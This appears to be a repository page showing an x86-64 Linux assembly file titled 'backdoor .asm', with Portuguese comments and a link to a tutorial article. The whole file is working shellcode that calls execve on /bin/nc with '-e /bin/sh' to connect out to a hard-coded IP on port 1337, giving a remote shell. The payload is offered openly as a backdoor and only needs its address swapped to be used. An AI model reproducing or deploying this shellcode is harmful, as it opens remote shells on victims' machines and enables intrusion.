-
Notifications
You must be signed in to change notification settings - Fork 5
/
backdoor .asm
43 lines (35 loc) · 923 Bytes
/
backdoor .asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
; article : http://chmodsecurity.com.br/artigo/23/writing-backdoor-in-asm-linux-64-bits-sycall-netcat.html
; backdoor netcat execve() sycall 59 linux _64
BITS 64
xor rdx,rdx ; zerando rdx
mov rdi,0x636e2f6e69622fff ; string /bin/nc
shr rdi,0x08
push rdi
mov rdi,rsp
mov rcx,0x68732f6e69622fff ; string /bin/sh
shr rcx,0x08
push rcx
mov rcx,rsp
mov rbx,0x652dffffffffffff ; argumento -e
shr rbx,0x30
push rbx
mov rbx,rsp
mov r10,0x37333331ffffffff ; porta do nc 1337
shr r10,0x20
push r10
mov r10,rsp
jmp short ip ; chamando a função com IP
continuar:
pop r9
push rdx ;push NULL ; argumento nulll evecve()
push rcx ;push address do 'bin/sh'
push rbx ;push address do argumento '-e'
push r10 ;push address da porta '1337'
push r9 ;push address do local 'ip'
push rdi ;push address netcat '/bin/nc'
mov rsi,rsp
mov al,59 ; sycall 59
syscall
ip:
call continuar
db "127.0.0.1"